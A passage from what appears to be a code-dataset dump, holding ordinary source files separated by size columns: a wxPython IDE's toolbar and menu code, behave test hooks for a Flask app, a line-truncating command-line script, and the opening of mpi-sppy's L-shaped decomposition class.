(ID_CONNECT_SHARE_BOOK, "Connect Share", "connect_share_on_16.png", 'Connect Share', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_RELOAD_BOOK, "Reload Books", "resultset_refresh.png", 'Reload Books', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
# (wx.ID_PREFERENCES, "Preferences", "preference.png", 'Preference', None),
]
if len(self.toolbarItems) == 0:
for tool in tools:
if len(tool) == 0:
toobar.AddSeparator()
# elif perspectiveName in tool[6]:
else:
logger.debug(tool)
state = tool[7]
if tool[8] == wx.ITEM_RADIO:
toolItem = toobar.AddToggleTool(tool[0], self.fileOperations.getImageBitmap(imageName=tool[2]), wx.NullBitmap, toggle=True, short_help_string=tool[3])
if tool[8] == wx.ITEM_CHECK:
toolItem = toobar.AddToggleTool(tool[0], self.fileOperations.getImageBitmap(imageName=tool[2]), wx.NullBitmap, toggle=True, short_help_string=tool[3])
toolItem.__setattr__('toggle', False)
toolItem.SetState(AUI_BUTTON_STATE_NORMAL)
toolItem.SetKind(wx.ITEM_CHECK)
elif tool[8] == wx.ITEM_NORMAL:
toolItem = toobar.AddSimpleTool(tool[0], tool[1], self.fileOperations.getImageBitmap(imageName=tool[2]), short_help_string=tool[3], kind=tool[8])
if state:
toolItem.state &= ~aui.AUI_BUTTON_STATE_DISABLED
else:
toolItem.state |= aui.AUI_BUTTON_STATE_DISABLED
if tool[4]:
self.Bind(wx.EVT_MENU, tool[4], tool[0])
if tool[5]:
toobar.SetToolDropDown(tool[0], tool[5])
self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=tool[0])
##############################################################
for tool in toobar._items:
self.toolbarItems[tool.GetId()] = tool
toobar._items.clear()
if self._ctrl:
self._ctrl.Hide()
for tool in tools:
if len(tool) != 0 and perspectiveName in tool[6]:
try:
if perspectiveName=='calibre':
toobar._items.append(self.toolbarItems[tool[0]])
else:
toobar._items.append(self.toolbarItems[tool[0]])
except Exception as e:
logger.error(e)
logger.error(tool[0], tool)
toobar.Realize()
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_NEW)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_RUN_AS_MENU)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_DEBUG_AS_MENU)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_NEW_JAVA_CLASS)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_CREATE_DYNAMIC_WEB_PROJECT)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_CREATE_NEW_SERVLET)
return toobar
def onCalibre(self, event):
# logger.debug(f'onCalibre {event.Id}')
viewToolbar = self._mgr.GetPane("viewToolbar").window
if event.Id == ID_RELOAD_BOOK:
logger.debug(f'ID_RELOAD_BOOK')
item=viewToolbar.FindTool(ID_RELOAD_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
pub.sendMessage('reloadingDatabase', event=event)
if event.Id == ID_ADD_BOOK:
logger.debug(f'ID_ADD_BOOK')
item=viewToolbar.FindTool(ID_ADD_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_EDIT_BOOK_METADATA:
logger.debug(f'ID_EDIT_BOOK_METADATA')
item=viewToolbar.FindTool(ID_EDIT_BOOK_METADATA)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_CONVERT_BOOK:
logger.debug(f'ID_CONVERT_BOOK')
item=viewToolbar.FindTool(ID_CONVERT_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_REMOVE_BOOK:
logger.debug('ID_REMOVE_BOOK')
item=viewToolbar.FindTool(ID_REMOVE_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
# toolRemove.state =aui.AUI_BUTTON_STATE_NORMAL
# pub.sendMessage('ID_REMOVE_BOOK', event=ID_REMOVE_BOOK)
if event.Id == ID_GET_BOOK:
logger.debug(f'ID_GET_BOOK')
item=viewToolbar.FindTool(ID_GET_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_CONNECT_SHARE_BOOK:
logger.debug(f'ID_CONNECT_SHARE_BOOK')
viewToolbar.Realize()
self._mgr.Update()
def onOpenTerminal(self, event):
logger.debug(f'onOpenTerminal {event.Id}')
def onSkipAllBreakPoints(self, event):
logger.debug(f'onSkipAllBreakPoints {event.Id}')
event.GetEventObject()._tip_item
# event.GetEventObject()._tip_item.__setattr__(toggle,False)
if event.GetEventObject()._tip_item.toggle:
# event.GetEventObject()._tip_item.SetBitmap(event.GetEventObject()._tip_item.GetBitmap())
event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_NORMAL)
else:
event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_PRESSED)
event.GetEventObject()._tip_item.toggle = not event.GetEventObject()._tip_item.toggle
event.GetEventObject().GetToolToggled(event.GetEventObject()._tip_item.GetId())
# event.GetEventObject().GetToolToggled(event.GetEventObject()._tip_item.GetId())
event.GetEventObject().Refresh(True)
event.GetEventObject().Update()
# if event.GetEventObject()._tip_item.GetState() != AUI_BUTTON_STATE_NORMAL:
# event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_NORMAL)
# else:
# event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_PRESSED)
def onOpenTask(self, event):
logger.debug('onOpenTask')
def onOpenSearch(self, event):
logger.debug('onOpenSearch')
def onRunAsMenu(self, event):
logger.debug('onRunAsMenu')
def onNewMenu(self, event):
logger.debug('onNewMenu')
newFileframe = NewFlowFrame(self, 'New', selectedPath="c:\work\python-project")
newFileframe.CenterOnScreen()
newFileframe.Show()
# def onSave(self, event):
# logger.debug('onSave1')
# viewToolbar = self._mgr.GetPane("viewToolbar")
# toolSave=viewToolbar.window.FindTool(ID_SAVE)
# toolSave.state =aui.AUI_BUTTON_STATE_DISABLED
# self._mgr.Update()
# def onSaveAll(self, event):
# logger.debug('onSaveAll1')
# viewToolbar = self._mgr.GetPane("viewToolbar")
# toolSaveAll=viewToolbar.window.FindTool(ID_SAVE_ALL)
# toolSaveAll.state =aui.AUI_BUTTON_STATE_DISABLED
# toolSave=viewToolbar.window.FindTool(ID_SAVE)
# toolSave.state =aui.AUI_BUTTON_STATE_DISABLED
# self._mgr.Update()
    def onRunDebugAsDropDown(self, event):
        """Show the drop-down popup menu for toolbar tools that have one
        (Run As, Debug As, New, New Java Class, servlet/web-project
        creators, Add Book).

        The menu contents come from literal tables keyed on the clicked
        tool id; entries are [id, label, icon-filename-or-None,
        handler-or-None] and an empty entry renders as a separator.  The
        popup is positioned under the tool, which is kept 'sticky'
        (pressed) while the menu is open.
        """
        if event.IsDropDownClicked():
            tb = event.GetEventObject()
            # Keep the button pressed while the popup is visible.
            tb.SetToolSticky(event.GetId(), True)
            baseList = list()
            if event.Id == ID_RUN_AS_MENU:
                baseList = [
                    [],
                    [ID_RUN_AS, 'Run As', None, None],
                    [ID_RUN_CONFIG, 'Run Configurations...', None, None],
                    [ID_ORGANIZE_FAVORITES, 'Organize Favorites..', None, None],
                ]
            elif event.Id == ID_DEBUG_AS_MENU:
                baseList = [
                    [],
                    [ID_DEBUG_AS, 'Debug As', None, None],
                    [ID_DEBUG_CONFIG, 'Run Configurations...', None, None],
                    [ID_ORGANIZE_FAVORITES, 'Organize Favorites..', None, None],
                ]
            elif event.Id == ID_ADD_BOOK:
                # NOTE(review): wx.NewIdRef() mints a fresh id on every
                # drop-down, so EVT_MENU bindings accumulate per click —
                # confirm whether a fixed id was intended.
                baseList = [
                    [],
                    [wx.NewIdRef(), 'Add book from directory', "new_testcase.png", None],
                ]
            elif event.Id == ID_NEW_JAVA_CLASS:
                baseList = [
                    [],
                    [ID_JUNIT_TEST_CASE, 'Junit Test Case', "new_testcase.png", None],
                    [ID_CLASS, 'Class', 'newclass_wiz.png', None],
                    [ID_INTERFACE, 'Interface', 'newint_wiz.png', None],
                    [ID_ENUM, 'Enum', 'newenum_wiz.png', None],
                    [ID_ANNOTATION, 'Annotation', 'newannotation_wiz.png', None],
                    [ID_JAX_WS_HANDLER, 'JAX-WS Handler', 'jax_ws.png', None],
                ]
            elif event.Id == ID_CREATE_DYNAMIC_WEB_PROJECT:
                baseList = [
                    [],
                    [ID_DYNAMIC_WEB_PROJECT, 'Dynamic Web Project', 'create_dynamic_web_project.png', None],
                    [ID_WEB_FRAGMENT_PROJECT, 'Web Fragment Project', 'web_fragment_prj.png', None],
                    [ID_EJB_PROJECT, 'EJB Project', 'ejb_project.png', None],
                    [ID_ENTERPRISE_APP_PROJECT, 'Enterprise Application Project', 'enterprise_app.png', None],
                    [ID_APP_CLIENT_PROJECT, 'Application Client Project', 'app_client_prj.png', None],
                    [ID_CONNECTER_PROJECT, 'Connecter Project', 'connecter_prj.png', None],
                    [ID_UTILITY_PROJECT, 'Utility Project', 'java_lib_obj.png', None],
                ]
            elif event.Id == ID_CREATE_NEW_SERVLET:
                baseList = [
                    [],
                    [ID_SERVLET, 'Servlet', 'create_new_servlet.png', None],
                    [ID_FILTER, 'Filter', 'filter.png', None],
                    [ID_LISTENER, 'Listener', 'listener.png', None],
                    [ID_SESSION_BEAN, 'Session Bean', 'session_bean.png', None],
                    [ID_MESSAGE_DRIVEN_BEAN, 'Message-Driven Bean', 'message_driven_bean.png', None],
                    [ID_EJB_TIMER, 'EJB Timer', 'session_bean.png', None],
                    [ID_JPA_ENTITY, 'JPA entity', 'eclipseLink_dynamic_entity.png', None],
                    [ID_JPA_ORM_MAPPING_FILE, 'JPA ORM Mapping File', 'jpa_orm_mapping.png', None],
                    [ID_ECLIPSE_LINK_ORM_MAPPING_FILE, 'Eclipse Link ORM Mapping File', 'jpa_orm_mapping.png', None],
                    [ID_XDOCKLET_ENTERPRISE_JAVA_BEAN, 'XDocklet Enterprise Java Bean', 'xdoclet_ejb.png', None],
                    [ID_ECLIPSELINK_DYNAMIC_ENTITY, 'EclipseLink Dynamic Entity', 'eclipseLink_dynamic_entity.png', None],
                ]
            elif event.Id == ID_NEW:
                # 'New' reuses the per-perspective menu table defined at
                # module level.
                baseList = menuItemList[self.selectedPerspectiveName]
            # Wrap the chosen table under the current perspective key, the
            # shape createMenuByPerspective expects.
            menuItemListx = {
                self.selectedPerspectiveName: baseList
            }
            # create the popup menu
            menuPopup = self.createMenuByPerspective(menuItemList=menuItemListx, perspectiveName=self.selectedPerspectiveName)
            # line up our menu with the button
            rect = tb.GetToolRect(event.GetId())
            pt = tb.ClientToScreen(rect.GetBottomLeft())
            pt = self.ScreenToClient(pt)
            self.PopupMenu(menuPopup, pt)
            # make sure the button is "un-stuck"
            tb.SetToolSticky(event.GetId(), False)
def createMenuByPerspective(self, menuItemList=None, perspectiveName='python'):
menuPopup = wx.Menu()
for menuItemName in menuItemList[perspectiveName]:
if len(menuItemName) > 1:
menuItem = wx.MenuItem(menuPopup, menuItemName[0], menuItemName[1])
if menuItemName[2]:
menuItem.SetBitmap(self.fileOperations.getImageBitmap(imageName=menuItemName[2]))
menuPopup.Append(menuItem)
self.Bind(wx.EVT_MENU, lambda e:self.onRightClickMenu(e), id=menuItemName[0])
else:
menuPopup.AppendSeparator()
return menuPopup
def creatingFileExplorer(self):
fileBrowserPanel = FileBrowser(self, size=(200, 300))
return fileBrowserPanel
def creatingTreeCtrl(self):
# Create a TreeCtrl
# treePanel = CreatingTreePanel(self)
treePanel = DataSourcePanel(self)
return treePanel
def getWorksheet(self, dataSourceTreeNode=None):
worksheetPanel = CreatingWorksheetWithToolbarPanel(self, -1, style=wx.CLIP_CHILDREN | wx.BORDER_NONE, dataSourceTreeNode=dataSourceTreeNode)
return worksheetPanel
def constructCenterPane(self):
worksheet = CreateWorksheetTabPanel(self)
# worksheet.addTab('Start Page')
return worksheet
def sqlConsoleOutputPane(self):
sqlConsoleOutputPanel = SqlConsoleOutputPanel(self)
return sqlConsoleOutputPanel
def constructHistoryPane(self):
historyGrid = HistoryGrid(self)
return historyGrid
def CreateSizeReportCtrl(self, width=80, height=80):
ctrl = SizeReportCtrl(self, -1, wx.DefaultPosition,
wx.Size(width, height), self._mgr)
return ctrl
class SizeReportCtrl(wx.PyControl):
    """Utility control that paints its own client size and, when managed,
    its AUI pane geometry (layer, dock, row, position, proportion).

    Useful as a placeholder pane when debugging AUI layouts.
    NOTE(review): wx.PyControl is the classic-wxPython name; on Phoenix
    this would be wx.Control — confirm which wx build is targeted.
    """

    def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
                 size=wx.DefaultSize, mgr=None):
        wx.PyControl.__init__(self, parent, id, pos, size, wx.NO_BORDER)
        self._mgr = mgr  # AuiManager used to look up this pane's geometry
        # self.Bind(wx.EVT_PAINT, self.OnPaint)
        self.Bind(wx.EVT_SIZE, self.OnSize)
        self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)

    def OnPaint(self, event):
        """Draw the current size and the pane's dock information."""
        dc = wx.PaintDC(self)
        size = self.GetClientSize()
        s = ("Size: %d x %d") % (size.x, size.y)
        dc.SetFont(wx.NORMAL_FONT)
        w, height = dc.GetTextExtent(s)
        height = height + 3
        dc.SetBrush(wx.WHITE_BRUSH)
        dc.SetPen(wx.WHITE_PEN)
        dc.DrawRectangle(0, 0, size.x, size.y)
        dc.SetPen(wx.LIGHT_GREY_PEN)
        dc.DrawLine(0, 0, size.x, size.y)
        dc.DrawLine(0, size.y, size.x, 0)
        # Integer division throughout: device-context coordinates must be
        # ints; `/` here was a Python-2 leftover producing floats.
        dc.DrawText(s, (size.x - w) // 2, (size.y - (height * 5)) // 2)
        if self._mgr:
            pi = self._mgr.GetPane(self)
            s = ("Layer: %d") % pi.dock_layer
            w, h = dc.GetTextExtent(s)
            dc.DrawText(s, (size.x - w) // 2, ((size.y - (height * 5)) // 2) + (height * 1))
            s = ("Dock: %d Row: %d") % (pi.dock_direction, pi.dock_row)
            w, h = dc.GetTextExtent(s)
            dc.DrawText(s, (size.x - w) // 2, ((size.y - (height * 5)) // 2) + (height * 2))
            s = ("Position: %d") % pi.dock_pos
            w, h = dc.GetTextExtent(s)
            dc.DrawText(s, (size.x - w) // 2, ((size.y - (height * 5)) // 2) + (height * 3))
            s = ("Proportion: %d") % pi.dock_proportion
            w, h = dc.GetTextExtent(s)
            dc.DrawText(s, (size.x - w) // 2, ((size.y - (height * 5)) // 2) + (height * 4))

    def OnEraseBackground(self, event):
        # Intentionally empty: suppresses background erase to avoid flicker.
        pass

    def OnSize(self, event):
        self.Refresh()
        event.Skip()
| 64,150 | 21,091 |
from flaskr import app
def before_feature(context, feature):
    """Behave hook: attach a Flask test client to the context before
    each feature runs."""
    application = app.create_app()
    application.testing = True
    context.client = application.test_client()
def before_scenario(context, scenario):
    """Behave hook: reset the per-scenario user and result collections."""
    context.users = []
    context.results = []
| 268 | 83 |
#! /usr/bin/env python3
import sys
import argparse
import signal
DEFAULT_LINE_LENGTH = 80


def parse_arguments(args):
    """Parse command-line arguments.

    Args:
        args: argument list to parse (e.g. ``sys.argv[1:]``).

    Returns:
        argparse.Namespace with ``length`` (int) and ``suffix`` (str).
    """
    parser = argparse.ArgumentParser(
        # Fixed typo: "Trucate" -> "Truncate".
        description="Truncate incoming lines to a specified length with an optional suffix"
    )
    parser.add_argument(
        "-l",
        "--length",
        help="The maximum length of each line",
        type=int,
        # Use the module constant instead of a duplicated hard-coded 80.
        default=DEFAULT_LINE_LENGTH,
    )
    parser.add_argument(
        "-s",
        "--suffix",
        help="A suffix to add to the end of truncated lines",
        default="",
    )
    return parser.parse_args(args)
def truncate_lines_from_handle(handle, length, suffix):
    """Yield each line of *handle* truncated to at most *length* characters,
    appending *suffix* to lines that were shortened.

    Fixes vs. the original:
    - the trailing newline is stripped before measuring, so the '\\n' no
      longer counts toward the length, and every yielded line is
      newline-free (the original yielded short lines WITH their newline
      and truncated lines without, which doubled newlines downstream);
    - a suffix longer than *length* no longer produces a negative slice
      index (which silently truncated from the wrong end).
    """
    for line in handle:
        line = line.rstrip("\n")
        if len(line) > length:
            keep = max(length - len(suffix), 0)
            yield f"{line[:keep]}{suffix}"
        else:
            yield line
def main(args):
    """Entry point: truncate stdin line-by-line per the CLI options.

    Returns 0 on success (exit status).
    """
    opts = parse_arguments(args)
    for line in truncate_lines_from_handle(sys.stdin, opts.length, opts.suffix):
        # rstrip before printing: print() adds exactly one newline, so any
        # newline still carried by the yielded line would double up.
        print(line.rstrip("\n"))
    return 0
if __name__ == "__main__":
    # Restore the default SIGPIPE disposition so piping into e.g. `head`
    # exits quietly on POSIX.  SIGPIPE does not exist on Windows, hence
    # the hasattr guard.
    if hasattr(signal, "SIGPIPE"):
        signal.signal(signal.SIGPIPE, signal.SIG_DFL)
    sys.exit(main(sys.argv[1:]))
| 1,042 | 343 |
# Copyright 2020 by B. Knueven, D. Mildebrath, C. Muir, J-P Watson, and D.L. Woodruff
# This software is distributed under the 3-clause BSD License.
import pyomo.environ as pyo
import mpisppy.utils.sputils as sputils
import numpy as np
import itertools
import time
import sys
import mpisppy.spbase as spbase
from mpisppy import MPI
from pyomo.core.plugins.transform.discrete_vars import RelaxIntegerVars
from mpisppy.utils.sputils import find_active_objective
from mpisppy.utils.lshaped_cuts import LShapedCutGenerator
from mpisppy.spopt import set_instance_retry
from pyomo.core import (
Objective, SOSConstraint, Constraint, Var
)
from pyomo.core.expr.visitor import identify_variables
from pyomo.repn.standard_repn import generate_standard_repn
from pyomo.core.expr.numeric_expr import LinearExpression
class LShapedMethod(spbase.SPBase):
""" Base class for the L-shaped method for two-stage stochastic programs.
Warning:
This class explicitly assumes minimization.
Args:
options (dict):
Dictionary of options. Possible (optional) options include
- root_scenarios (list) - List of scenario names to include as
part of the root problem (default [])
- store_subproblems (boolean) - If True, the BendersDecomp object
will maintain a dictionary containing the subproblems created by
the BendersCutGenerator.
- relax_root (boolean) - If True, the LP relaxation of the root
problem is solved (i.e. integer variables in the root problem
are relaxed).
- scenario_creator_kwargs (dict) - Keyword args to pass to the scenario_creator.
- valid_eta_lb (dict) - Dictionary mapping scenario names to valid
lower bounds for the eta variables--i.e., a valid lower (outer)
bound on the optimal objective value for each scenario. If none
are provided, the lower bound is set to -sys.maxsize *
scenario_prob, which may cause numerical errors.
- indx_to_stage (dict) - Dictionary mapping the index of every
variable in the model to the stage they belong to.
all_scenario_names (list):
List of all scenarios names present in the model (strings).
scenario_creator (callable):
Function which take a scenario name (string) and returns a
Pyomo Concrete model with some things attached.
scenario_denouement (callable, optional):
Function which does post-processing and reporting.
all_nodenames (list, optional):
List of all node name (strings). Can be `None` for two-stage
problems.
mpicomm (MPI comm, optional):
MPI communicator to use between all scenarios. Default is
`MPI.COMM_WORLD`.
scenario_creator_kwargs (dict, optional):
Keyword arguments to pass to `scenario_creator`.
"""
def __init__(
self,
options,
all_scenario_names,
scenario_creator,
scenario_denouement=None,
all_nodenames=None,
mpicomm=None,
scenario_creator_kwargs=None,
):
super().__init__(
options,
all_scenario_names,
scenario_creator,
scenario_denouement=scenario_denouement,
all_nodenames=all_nodenames,
mpicomm=mpicomm,
scenario_creator_kwargs=scenario_creator_kwargs,
)
if self.multistage:
raise Exception("LShaped does not currently support multiple stages")
self.options = options
self.options_check()
self.all_scenario_names = all_scenario_names
self.root = None
self.root_vars = None
self.scenario_count = len(all_scenario_names)
self.store_subproblems = False
if "store_subproblems" in options:
self.store_subproblems = options["store_subproblems"]
self.root_scenarios = None
if "root_scenarios" in options:
self.root_scenarios = options["root_scenarios"]
self.relax_root = False
if "relax_root" in options:
self.relax_root = options["relax_root"]
self.valid_eta_lb = None
if "valid_eta_lb" in options:
self.valid_eta_lb = options["valid_eta_lb"]
self.compute_eta_bound = False
else: # fit the user does not provide a bound, compute one
self.valid_eta_lb = { scen : (-sys.maxsize - 1) * 1. / len(self.all_scenario_names) \
for scen in self.all_scenario_names }
self.compute_eta_bound = True
if scenario_creator_kwargs is None:
self.scenario_creator_kwargs = dict()
else:
self.scenario_creator_kwargs = scenario_creator_kwargs
self.indx_to_stage = None
self.has_valid_eta_lb = self.valid_eta_lb is not None
self.has_root_scens = self.root_scenarios is not None
if self.store_subproblems:
self.subproblems = dict.fromkeys(scenario_names)
def options_check(self):
""" Check to ensure that the user-specified options are valid. Requried
options are:
- root_solver (string) - Solver to use for the root problem.
- sp_solver (string) - Solver to use for the subproblems.
"""
required = ["root_solver", "sp_solver"]
if "root_solver_options" not in self.options:
self.options["root_solver_options"] = dict()
if "sp_solver_options" not in self.options:
self.options["sp_solver_options"] = dict()
self._options_check(required, self.options)
def _add_root_etas(self, root, index):
def _eta_bounds(m, s):
return (self.valid_eta_lb[s],None)
root.eta = pyo.Var(index, within=pyo.Reals, bounds=_eta_bounds)
    def _create_root_no_scenarios(self):
        """Build the root (first-stage) problem from a copy of the first
        scenario: strip second-stage constraints and variables, add one eta
        variable per scenario, and rebuild the objective over the first-stage
        variables plus the etas (always posed as a minimization).
        """
        # using the first scenario as a basis
        root = self.scenario_creator(
            self.all_scenario_names[0], **self.scenario_creator_kwargs
        )
        if self.relax_root:
            RelaxIntegerVars().apply_to(root)
        nonant_list, nonant_ids = _get_nonant_ids(root)
        self.root_vars = nonant_list
        # drop every constraint that mentions a second-stage variable
        for constr_data in list(itertools.chain(
                root.component_data_objects(SOSConstraint, active=True, descend_into=True)
                , root.component_data_objects(Constraint, active=True, descend_into=True))):
            if not _first_stage_only(constr_data, nonant_ids):
                _del_con(constr_data)
        # delete the second stage variables
        for var in list(root.component_data_objects(Var, active=True, descend_into=True)):
            if id(var) not in nonant_ids:
                _del_var(var)
        # one eta per scenario (no scenarios are embedded in this root)
        self._add_root_etas(root, self.all_scenario_names)
        # pulls the current objective expression, adds in the eta variables,
        # and removes the second stage variables from the expression
        obj = find_active_objective(root)
        repn = generate_standard_repn(obj.expr, quadratic=True)
        if len(repn.nonlinear_vars) > 0:
            raise ValueError("LShaped does not support models with nonlinear objective functions")
        linear_vars = list()
        linear_coefs = list()
        quadratic_vars = list()
        quadratic_coefs = list()
        ## we'll assume the constant is part of stage 1 (wlog it is), just
        ## like the first-stage bits of the objective
        constant = repn.constant
        ## only keep the first stage variables in the objective
        for coef, var in zip(repn.linear_coefs, repn.linear_vars):
            id_var = id(var)
            if id_var in nonant_ids:
                linear_vars.append(var)
                linear_coefs.append(coef)
        # a quadratic term survives only if BOTH factors are first-stage
        for coef, (x,y) in zip(repn.quadratic_coefs, repn.quadratic_vars):
            id_x = id(x)
            id_y = id(y)
            if id_x in nonant_ids and id_y in nonant_ids:
                quadratic_coefs.append(coef)
                quadratic_vars.append((x,y))
        # checks if model sense is max, if so negates the objective
        if not self.is_minimizing:
            for i,coef in enumerate(linear_coefs):
                linear_coefs[i] = -coef
            for i,coef in enumerate(quadratic_coefs):
                quadratic_coefs[i] = -coef
        # add the etas (unit coefficient: each eta under-estimates one
        # scenario's second-stage cost)
        for var in root.eta.values():
            linear_vars.append(var)
            linear_coefs.append(1)
        expr = LinearExpression(constant=constant, linear_coefs=linear_coefs,
                                linear_vars=linear_vars)
        if quadratic_coefs:
            expr += pyo.quicksum(
                (coef*x*y for coef,(x,y) in zip(quadratic_coefs, quadratic_vars))
            )
        root.del_component(obj)
        # set root objective function
        root.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
        self.root = root
    def _create_root_with_scenarios(self):
        """Build the root problem as an extensive form over the user-selected
        `root_scenarios`, add eta variables for the remaining scenarios, and
        rebuild the objective so second-stage terms carry the scenario/bundle
        probability (always posed as a minimization).
        """
        ef_scenarios = self.root_scenarios
        ## we want the correct probabilities to be set when
        ## calling create_EF
        if len(ef_scenarios) > 1:
            def scenario_creator_wrapper(name, **creator_options):
                scenario = self.scenario_creator(name, **creator_options)
                # default to equal probability across ALL scenarios
                if not hasattr(scenario, '_mpisppy_probability'):
                    scenario._mpisppy_probability = 1./len(self.all_scenario_names)
                return scenario
            root = sputils.create_EF(
                ef_scenarios,
                scenario_creator_wrapper,
                scenario_creator_kwargs=self.scenario_creator_kwargs,
            )
            nonant_list, nonant_ids = _get_nonant_ids_EF(root)
        else:
            # a single root scenario: use the scenario model directly
            root = self.scenario_creator(
                ef_scenarios[0],
                **self.scenario_creator_kwargs,
            )
            if not hasattr(root, '_mpisppy_probability'):
                root._mpisppy_probability = 1./len(self.all_scenario_names)
            nonant_list, nonant_ids = _get_nonant_ids(root)
        self.root_vars = nonant_list
        # creates the eta variables for scenarios that are NOT selected to be
        # included in the root problem
        eta_indx = [scenario_name for scenario_name in self.all_scenario_names
                    if scenario_name not in self.root_scenarios]
        self._add_root_etas(root, eta_indx)
        obj = find_active_objective(root)
        repn = generate_standard_repn(obj.expr, quadratic=True)
        if len(repn.nonlinear_vars) > 0:
            raise ValueError("LShaped does not support models with nonlinear objective functions")
        linear_vars = list(repn.linear_vars)
        linear_coefs = list(repn.linear_coefs)
        quadratic_coefs = list(repn.quadratic_coefs)
        # adjust coefficients by scenario/bundle probability
        scen_prob = root._mpisppy_probability
        # only second-stage terms are scaled; first-stage terms are shared
        for i,var in enumerate(repn.linear_vars):
            if id(var) not in nonant_ids:
                linear_coefs[i] *= scen_prob
        for i,(x,y) in enumerate(repn.quadratic_vars):
            # only multiply through once
            if id(x) not in nonant_ids:
                quadratic_coefs[i] *= scen_prob
            elif id(y) not in nonant_ids:
                quadratic_coefs[i] *= scen_prob
        # NOTE: the LShaped code negates the objective, so
        # we do the same here for consistency
        if not self.is_minimizing:
            for i,coef in enumerate(linear_coefs):
                linear_coefs[i] = -coef
            for i,coef in enumerate(quadratic_coefs):
                quadratic_coefs[i] = -coef
        # add the etas
        for var in root.eta.values():
            linear_vars.append(var)
            linear_coefs.append(1)
        expr = LinearExpression(constant=repn.constant, linear_coefs=linear_coefs,
                                linear_vars=linear_vars)
        if repn.quadratic_vars:
            expr += pyo.quicksum(
                (coef*x*y for coef,(x,y) in zip(quadratic_coefs, repn.quadratic_vars))
            )
        root.del_component(obj)
        # set root objective function
        root.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
        self.root = root
def _create_shadow_root(self):
root = pyo.ConcreteModel()
arb_scen = self.local_scenarios[self.local_scenario_names[0]]
nonants = arb_scen._mpisppy_node_list[0].nonant_vardata_list
root_vars = list()
for v in nonants:
nonant_shadow = pyo.Var(name=v.name)
root.add_component(v.name, nonant_shadow)
root_vars.append(nonant_shadow)
if self.has_root_scens:
eta_indx = [scenario_name for scenario_name in self.all_scenario_names
if scenario_name not in self.root_scenarios]
else:
eta_indx = self.all_scenario_names
self._add_root_etas(root, eta_indx)
root.obj = None
self.root = root
self.root_vars = root_vars
def set_eta_bounds(self):
if self.compute_eta_bound:
## for scenarios not in self.local_scenarios, these will be a large negative number
this_etas_lb = np.fromiter((self.valid_eta_lb[scen] for scen in self.all_scenario_names),
float, count=len(self.all_scenario_names))
all_etas_lb = np.empty_like(this_etas_lb)
self.mpicomm.Allreduce(this_etas_lb, all_etas_lb, op=MPI.MAX)
for idx, s in enumerate(self.all_scenario_names):
self.valid_eta_lb[s] = all_etas_lb[idx]
# root may not have etas for every scenarios
for s, v in self.root.eta.items():
v.setlb(self.valid_eta_lb[s])
def create_root(self):
""" creates a ConcreteModel from one of the problem scenarios then
modifies the model to serve as the root problem
"""
if self.cylinder_rank == 0:
if self.has_root_scens:
self._create_root_with_scenarios()
else:
self._create_root_no_scenarios()
else:
## if we're not rank0, just create a root to
## hold the nonants and etas; rank0 will do
## the optimizing
self._create_shadow_root()
def attach_nonant_var_map(self, scenario_name):
instance = self.local_scenarios[scenario_name]
subproblem_to_root_vars_map = pyo.ComponentMap()
for var, rvar in zip(instance._mpisppy_data.nonant_indices.values(), self.root_vars):
if var.name not in rvar.name:
raise Exception("Error: Complicating variable mismatch, sub-problem variables changed order")
subproblem_to_root_vars_map[var] = rvar
# this is for interefacing with PH code
instance._mpisppy_model.subproblem_to_root_vars_map = subproblem_to_root_vars_map
    def create_subproblem(self, scenario_name):
        """ the subproblem creation function passed into the
            BendersCutsGenerator

        Rebuilds the scenario's objective over second-stage terms only
        (probability-weighted, always minimizing), optionally solves the
        relaxed subproblem to compute a valid eta lower bound, relaxes
        integrality, removes first-stage-only constraints, and returns the
        instance together with a root-var -> subproblem-var map.
        """
        instance = self.local_scenarios[scenario_name]
        nonant_list, nonant_ids = _get_nonant_ids(instance)
        # NOTE: since we use generate_standard_repn below, we need
        #       to unfix any nonants so they'll properly appear
        #       in the objective
        fixed_nonants = [ var for var in nonant_list if var.fixed ]
        for var in fixed_nonants:
            var.fixed = False
        # pulls the scenario objective expression, removes the first stage variables, and sets the new objective
        obj = find_active_objective(instance)
        if not hasattr(instance, "_mpisppy_probability"):
            # default to equal probability if the creator did not set one
            instance._mpisppy_probability = 1. / self.scenario_count
        _mpisppy_probability = instance._mpisppy_probability
        repn = generate_standard_repn(obj.expr, quadratic=True)
        if len(repn.nonlinear_vars) > 0:
            raise ValueError("LShaped does not support models with nonlinear objective functions")
        linear_vars = list()
        linear_coefs = list()
        quadratic_vars = list()
        quadratic_coefs = list()
        ## we'll assume the constant is part of stage 1 (wlog it is), just
        ## like the first-stage bits of the objective
        constant = repn.constant
        ## only keep the second stage variables in the objective
        for coef, var in zip(repn.linear_coefs, repn.linear_vars):
            id_var = id(var)
            if id_var not in nonant_ids:
                linear_vars.append(var)
